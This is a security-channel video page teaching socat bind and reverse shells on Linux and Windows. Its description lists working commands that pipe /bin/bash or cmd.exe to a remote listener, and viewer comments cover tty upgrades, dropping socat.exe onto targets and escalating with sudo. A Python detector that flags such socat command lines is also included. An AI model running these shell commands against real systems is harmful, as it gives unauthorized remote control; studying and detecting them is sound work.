
How To Get A FULLY Interactive Reverse Shell in Linux OR Windows

29,810 views

Jason Ford {JSON:SEC}

3 years ago

Netcat is an amazing tool, useful and versatile for penetration tests and for other IT administration tasks. However, it is very limited, especially for penetration testing.
A reverse shell with socat gives you a much higher degree of interactivity, even letting you edit files on the command line, just like an SSH session.
Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Attacker: socat - TCP4:192.168.1.1:4443
Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT
Encrypted Bind / Reverse Shells
Read this article: erev0s.com/blog/encrypted-bin...
Links:
__________________________________________
Twitter: / json_sec
Buy me a coffee: PayPal.Me/jsonsec
===== About JSON : Sec =====
JSON Sec is a cyber security KZbin channel, bringing you a range of videos from technical tutorials and security tips to documentaries. The goal is to help everybody, at all technical levels, improve the security of their digital life.
Please consider subscribing if you enjoyed this video!
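
For defenders, the bind and reverse shell commands above share one host-side trait: socat joins a network address to an EXEC address. The following Python example is added here and is not from the video or its author; it flags that pattern in process command lines. The log format, sample records and function names are constructed for illustration, and the keyword sets cover only common TCP and OpenSSL address types.

```python
import re

# socat address types that attach a program to the data stream.
EXEC_TYPES = {"EXEC", "SYSTEM"}
# Network address types (not exhaustive): listening vs. outbound.
LISTEN_TYPES = {"TCP-LISTEN", "TCP4-LISTEN", "TCP6-LISTEN", "OPENSSL-LISTEN"}
CONNECT_TYPES = {"TCP", "TCP4", "TCP6", "OPENSSL"}

def socat_keywords(cmdline):
    """Return the upper-cased address keywords of a socat command line, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        # Match on the basename so /usr/bin/socat and C:\tools\socat.exe both count.
        if re.split(r"[\\/]", tok.strip("\"'"))[-1].lower() in ("socat", "socat.exe"):
            args = tokens[i + 1:]
            break
    else:
        return None
    # Options start with '-'; a lone '-' is socat's STDIO address, so keep it.
    addrs = [a for a in args if a == "-" or not a.startswith("-")]
    return {a.split(":", 1)[0].strip("\"'").upper() for a in addrs}

def classify(cmdline):
    """Label a process command line as 'bind shell', 'reverse shell' or None."""
    kws = socat_keywords(cmdline)
    if not kws or not kws & EXEC_TYPES:
        return None  # not socat, or no program attached to the stream
    if kws & LISTEN_TYPES:
        return "bind shell"
    return "reverse shell" if kws & CONNECT_TYPES else None

# Constructed process-creation records: "<host>\t<command line>".
SAMPLE_LOG = """\
web01\tsocat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
ws-17\tC:\\Users\\Public\\socat.exe TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
proxy2\tsocat TCP4-LISTEN:8080,fork TCP4:10.0.0.5:80
build3\t/usr/bin/socat - UNIX-CONNECT:/var/run/docker.sock
web01\tnginx -g daemon off;
"""

def scan(log_text):
    """Return (host, verdict) for every record that classify() flags."""
    records = (line.partition("\t") for line in log_text.splitlines())
    return [(h, classify(c)) for h, _, c in records if classify(c)]

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_LOG):
        print(f"{host}: socat {verdict}")
```

Port forwarding and UNIX-socket uses of socat are not flagged, because neither attaches a program to the stream.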

Comments: 43
@saurabhkumar1976 3 years ago
Thanks for this 😊
@MartinGaertner 11 months ago
Very great video, thank you very much!
@joeljohnson5576 2 years ago
great stuff mann, Thanks
@Hartley94 3 years ago
Thank you.
@BrianPrisbe 2 years ago
Awesome
@SpamSandra-lh3nq 7 months ago
great!!!
@mercury1803 3 years ago
have you tried spawning a tty while using nc, you can also use the stty trick to make sure `Ctrl + C` doesn't kill the process
@mercury1803 3 years ago
I can demonstrate this in TryHackMe's discord if you want, KZbin comments are slightly clunky...
@JSONSEC 3 years ago
As I said in the video, I've tried a lot of things like fully interactive tty shell, adding key shortcuts etc. But nothing has worked so effortlessly and so smoothly as this
@MarsTheProgrammer 2 years ago
The biggest selling point is that you can encrypt the connection with socat.
@Carinala8257 2 years ago
I run socat on a Windows machine in a cmd with admin rights, but unfortunately I only have user rights in the remote shell after a successful connection. Does anyone have a solution for this?
@_hawk_8681 1 year ago
Get the sudo password of the remote Linux machine, once u have it. Connect to it and then 'sudo su', it will ask for password, enter the password and ur now admin...
@marounahel8205 1 year ago
I really liked your video
@JSONSEC 1 year ago
I really liked your comment
@chileaus 2 years ago
Is there a way to reverse shell over the internet?
@_hawk_8681 1 year ago
Well, if u wanna do it on WAN, then make sure to look on to port forwarding stuffs and ssh. You can probably use port forwarding with metasploit to do hacking on the internet.
@skyone9237 3 years ago
Gr8. ❤️❤️
@unam456 1 year ago
The Windows 11 isolation core and memory integrity protect against this type of attacks? And if i got filtrated ports, router with firewall, nat, antivirus and PC firewall?
@JSONSEC 1 year ago
Oh gosh, that's way more than I anticipated for this video. I suppose the scope was more for CTFs
@unam456 1 year ago
@@JSONSEC but u maybe know if that things protect me against this type of attacks, am worried because a person was tryin to hack me
@itsme7570 1 year ago
Thank you!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!🎉🎉🎉🎉🎉🎉🎉🎉🎉
@Urbancorax2 2 years ago
thank you for that. Now, show everybody how to socat using ssl, transfer files and something else interesting:)
@Mike-cp1tj 4 months ago
but don't you need the target to have socat installed? on a Windows target isn't this super unlikely
@JSONSEC 4 months ago
Pretty common on Linux, Windows you can drop a PowerShell one liner
@vikhyatverma4016 2 years ago
It'd be great if i could do that on windows...
@randomstatements8034 2 years ago
How would this work in windows
@JSONSEC 1 year ago
Simply drop the socat.exe file across and use the same commands :)
@Nexxal 1 year ago
@@JSONSEC what exe file
@papahorse3347 2 years ago
ty so much, can you start doing some try to hack me walkthrough videos? your explaining is really good and it would be nice to learn more from you
@JSONSEC 2 years ago
I plan on building my own machines and do walkthroughs. I think there are plenty of other great guys that explain things just as well / if not better than me :)
@BellatrixLugosi 2 years ago
The problem is they don't have socat installed, or any compiler
@JSONSEC 2 years ago
You'd be surprised how common it is
@BellatrixLugosi 2 years ago
@@JSONSEC I have rooted hundreds of Linux and BSD servers, and they don't have socat installed, the way I get a fully tty shell is using mostly the python pty module
@iakashx 2 years ago
Noice. 👍 Just wanna highlight some things because I ran into them while doing this. socat file:`tty`,raw,echo=0 tcp-listen:4444 This listener didn't work properly when I tried to get reverse shell from target (say php or any kinda exploit / nc rev shell etc.) Initially I thought this has to do something with bash/zsh. But it wasn't. Finally, I got rev shell on nc first. Got socat is present on target. Then I created another shell with socat. ✌✌ Edit: Modified php-rev-shell to directly give me shell on socat. Better now. :)
@bendomino8476 3 years ago
this is good but not every victim machine will have socat preinstalled
@JSONSEC 2 years ago
You'd be surprised how many do. But if it doesn't you can simply transfer the binary instead of a nc or a msfv shell
2 years ago
@@JSONSEC how would you do that? is there a script i can install on the "victim" WINDOWS computer and it automatically installs socat and runs the command to connect? i have been trying for hours to setup a listener on a kali linux virtual machine and connect with my windows computer. can you help? thanks
@codermomo1792 1 month ago
@@JSONSEC AV will not be happy
@Firoz900 3 years ago
What? Are you serious?
@jasonford2877 3 years ago
Sure am. Of course it won't work for EVERY circumstance, but neither does netcat
@Firoz900 3 years ago
@@jasonford2877 Guru is always right!
@JSONSEC 3 years ago
Certainly not! Being wrong gives you a chance to learn! :)